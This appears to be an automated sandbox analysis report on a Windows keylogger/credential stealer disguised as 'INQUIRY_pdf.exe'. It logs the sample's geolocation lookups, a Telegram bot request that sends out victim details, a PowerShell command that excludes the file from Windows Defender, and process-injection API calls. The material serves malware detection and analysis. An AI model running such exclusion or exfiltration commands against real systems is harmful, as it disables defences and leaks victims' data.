2024-11-18 17:41:05 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:09 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:41:09 UTC	844	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:09 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 7707 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qGYkJ5LG9Xxct%2F4rFlmcXKfP5IJupo3p13xULicHqyfqIrDNpV93DiyfXLJmwACBybyvcJqVvs9rLRts9FmNx1Wbdjt0IJSnsQOIBiT7NEvY6FrEUmY4z52NHCML7il4eEAHq28n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49bfee1a18b0a6-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19030&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=149470&cwnd=32&unsent_bytes=0&cid=97749be082cb1fd4&ts=694&x=0"
2024-11-18 17:41:09 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:11 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:41:12 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:12 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 53146 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=blQNgVUOG22rAlQ%2Bnp6mCAdVmzcL1ObZs%2BBNMwVdcZRU39wFcLLeP5wNWrbqVYXukuRA9iFLyyF%2FOALosKI3U0S2CxiWNCxkwJPsWsjeqo4UYVs9Nc%2FdzYcdNiGOqUKXZ4E%2FHxVk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49bffe0a87e749-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19344&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=150184&cwnd=32&unsent_bytes=0&cid=7a177c198df8935f&ts=171&x=0"
2024-11-18 17:41:12 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:13 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:41:13 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:13 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 53147 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCfU5St%2B7W6LlTXfbYkzXnVoS6%2FUQWuS%2B0KsWO0gmDBuSPjNpqRgA7SKsj1NuG%2BKUDMEykNZToWrhJ4ayl3ATBXrShq2t0aswzeJing8tA%2FXFz0DkYqFKm3HuShEoJYi2eZM5E7k"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49c0090ec5e66a-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=129435&cwnd=32&unsent_bytes=0&cid=d22a5b3ec5b9a8ca&ts=194&x=0"
2024-11-18 17:41:13 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:16 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:41:16 UTC	852	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:16 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1745 Last-Modified: Mon, 18 Nov 2024 17:12:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJo7CODa4sU%2FG00nFRJg%2BPzXqsJCYrgAPzjTC7h1TA6SYY0csbrOQ9HJCD%2Fky2UdN6YjYn%2FuxGVCtftRgVoWcrivRAsHsalnR3Ojs3eg8Q0wC%2FslzDDFhMuCmve4xej5g2hMtCSb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49c01acea54c99-MSP alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28244&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=102487&cwnd=32&unsent_bytes=0&cid=9c2b626b60819118&ts=240&x=0"
2024-11-18 17:41:16 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	149.154.167.220	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:17 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2019/11/2024%20/%2010:54:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-18 17:41:17 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 18 Nov 2024 17:41:17 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-18 17:41:17 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	12:40:52
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\INQUIRY_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\INQUIRY_pdf.exe"
Imagebase:	0x700000
File size:	768'512 bytes
MD5 hash:	AAD0E1F44C81477576E5B1A1A31F3513
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:40:54
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe"
Imagebase:	0xd40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:40:54
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:40:54
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\INQUIRY_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\INQUIRY_pdf.exe"
Imagebase:	0x600000
File size:	768'512 bytes
MD5 hash:	AAD0E1F44C81477576E5B1A1A31F3513
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:40:56
Start date:	18/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	153
Total number of Limit Nodes:	11

Executed Functions

Function 0AEC0040 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712959060.000000000AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aec0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 389c3ce169633ce42eb2cc421fd7aeccf3c8fed87e6c3ac8c8c081187cdbfdde
Instruction ID: dd6f5000efbd682e39a01b63b9e646a3571f9b702a1e6c7c7ba582a1418c50ec
Opcode Fuzzy Hash: 389c3ce169633ce42eb2cc421fd7aeccf3c8fed87e6c3ac8c8c081187cdbfdde
Instruction Fuzzy Hash: 28329874B11204DFDB29DB69C650BAEBBF6AF89304F24446DE506DB3A0DB30E902CB51

Function 078A3032 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ef71528dc3793152bfd263d0f0cfe5ac39e67012f123148df6923c21710366
Instruction ID: 33e40862dd20fc70d729855654f4a517d84a6ea9a660341c85908ba992561f62
Opcode Fuzzy Hash: 28ef71528dc3793152bfd263d0f0cfe5ac39e67012f123148df6923c21710366
Instruction Fuzzy Hash: FCC1B0B4E042199FDB14CFA9C980A9EFBF2BF89304F24956AE819E7355DB309941CF50

Function 0110E398 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0110E416
GetCurrentThread.KERNEL32 ref: 0110E453
GetCurrentProcess.KERNEL32 ref: 0110E490
GetCurrentThreadId.KERNEL32 ref: 0110E4E9

Strings

QQ, xrefs: 0110E3B4

Memory Dump Source

Source File: 00000000.00000002.1702134385.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_INQUIRY_pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID: QQ
API String ID: 2063062207-127192606
Opcode ID: 8ff1d990ff13d1301a0324e3d8dc5514f0c6cbee944acb5be8ff356ef90be57e
Instruction ID: f63ee1841b06e1870aacf4664476bd3eb1f4cf47346b059514fa151468ccdba5
Opcode Fuzzy Hash: 8ff1d990ff13d1301a0324e3d8dc5514f0c6cbee944acb5be8ff356ef90be57e
Instruction Fuzzy Hash: 1A5157B0D01649CFDB18CFAADA88B9EBBF1EF88314F248859E019A7290D7745944CB65

Function 078ACAEC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078ACD2E

Strings

QQ, xrefs: 078ACB33
QQ, xrefs: 078ACB62

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: CreateProcess
String ID: QQ$QQ
API String ID: 963392458-1443788807
Opcode ID: 8952ad40f8bb7c8a75cfe4aeb3022b0a91a4cff72e840de5fb56204ad65fee16
Instruction ID: 3a501a2b6011b11e240e55038be0e16e2c6bf9f662eae01ea250cb5314e4f181
Opcode Fuzzy Hash: 8952ad40f8bb7c8a75cfe4aeb3022b0a91a4cff72e840de5fb56204ad65fee16
Instruction Fuzzy Hash: B8A16DB1D0021ADFEB24CF69C885BDDBBB2BF58314F148569D809E7280DB749985CFA1

Function 078ACAF8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078ACD2E

Strings

QQ, xrefs: 078ACB33
QQ, xrefs: 078ACB62

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: CreateProcess
String ID: QQ$QQ
API String ID: 963392458-1443788807
Opcode ID: d8421eb8acaa397654cae6f0dbcdbce9ddfe9513e22b9ae9dde0c60abef373dd
Instruction ID: 623c7908ce15bddb0d2b97c08257e15d58f34ce908e2c26ea98068e7770962ee
Opcode Fuzzy Hash: d8421eb8acaa397654cae6f0dbcdbce9ddfe9513e22b9ae9dde0c60abef373dd
Instruction Fuzzy Hash: 7F916DB1D0021ADFEB24CF69C845BDDBBB2BF58314F148569D809E7280DB749985CFA1

Function 011058EC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011059A9

Strings

QQ, xrefs: 0110592C

Memory Dump Source

Source File: 00000000.00000002.1702134385.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_INQUIRY_pdf.jbxd

Similarity

API ID: Create
String ID: QQ
API String ID: 2289755597-127192606
Opcode ID: 1a41f3323d01179219799e4cc262e112aea9ff819a64bc4c802f1e56a865883b
Instruction ID: 20a291e3728113f7e8ea0c4d59bd973136f825b9b50fa5d42e6b5c21cf805d10
Opcode Fuzzy Hash: 1a41f3323d01179219799e4cc262e112aea9ff819a64bc4c802f1e56a865883b
Instruction Fuzzy Hash: 7041D1B0C00719CFDB25CFA9C984B8EBBF6BF49304F20805AD408AB255DBB56945CF90

Function 011044D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011059A9

Strings

QQ, xrefs: 0110592C

Memory Dump Source

Source File: 00000000.00000002.1702134385.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_INQUIRY_pdf.jbxd

Similarity

API ID: Create
String ID: QQ
API String ID: 2289755597-127192606
Opcode ID: 78a27569a6d87345392f273c20392e4e1c96e340dba1970862b96ff06bd5ec29
Instruction ID: 608912e0483d180b03cba3c9bd31978876c2e8a70f4a3d3e6881a321920ae5b0
Opcode Fuzzy Hash: 78a27569a6d87345392f273c20392e4e1c96e340dba1970862b96ff06bd5ec29
Instruction Fuzzy Hash: 3741C2B0C00719CBDB25DFA9C984B9EBBF6BF49304F20805AD409AB255DBB56945CF90

Function 078AC868 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078AC900

Strings

QQ, xrefs: 078AC88F

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: QQ
API String ID: 3559483778-127192606
Opcode ID: ceebb58e32a4ea740cd24f10dc27a7bbcacc5677fa38a17d5c973b185d6217e9
Instruction ID: cf14b20e3606d75720b8414f29a0c3c62613e5f9355ed6e60e4ca84c7cd87039
Opcode Fuzzy Hash: ceebb58e32a4ea740cd24f10dc27a7bbcacc5677fa38a17d5c973b185d6217e9
Instruction Fuzzy Hash: B32126B19003099FDB10CFA9C885BDEBBF5FF48320F10842AE958A7240D7789944DBA4

Function 078AC870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078AC900

Strings

QQ, xrefs: 078AC88F

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: QQ
API String ID: 3559483778-127192606
Opcode ID: e685d375515a200a0e9baa8e9d96941b8e35d54e87db99f610ad1b9c5c1a9c32
Instruction ID: b08f4dde0799b8ab1a4c468cd81249853e7908911834cf541952ef53ca47aa7e
Opcode Fuzzy Hash: e685d375515a200a0e9baa8e9d96941b8e35d54e87db99f610ad1b9c5c1a9c32
Instruction Fuzzy Hash: 352126B1D003199FDB10CFA9C885BDEBBF5FF48320F14842AE918A7240D7789944DBA0

Function 078AC6D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078AC756

Strings

QQ, xrefs: 078AC6F4

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID: QQ
API String ID: 983334009-127192606
Opcode ID: 0e39e3348927790d75b168831f0d7b6c9025623154308319968bcf41b0f77bef
Instruction ID: 74c00d12aca9d019379f1b3596ee95f52f0006b5dd90373bf332ce9012bb2494
Opcode Fuzzy Hash: 0e39e3348927790d75b168831f0d7b6c9025623154308319968bcf41b0f77bef
Instruction Fuzzy Hash: AB2138B1D002099FDB10DFAAC5857EEBBF5EF98320F24842AD519A7340CB789945CFA1

Function 078AC959 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078AC9E0

Strings

QQ, xrefs: 078AC97F

Memory Dump Source
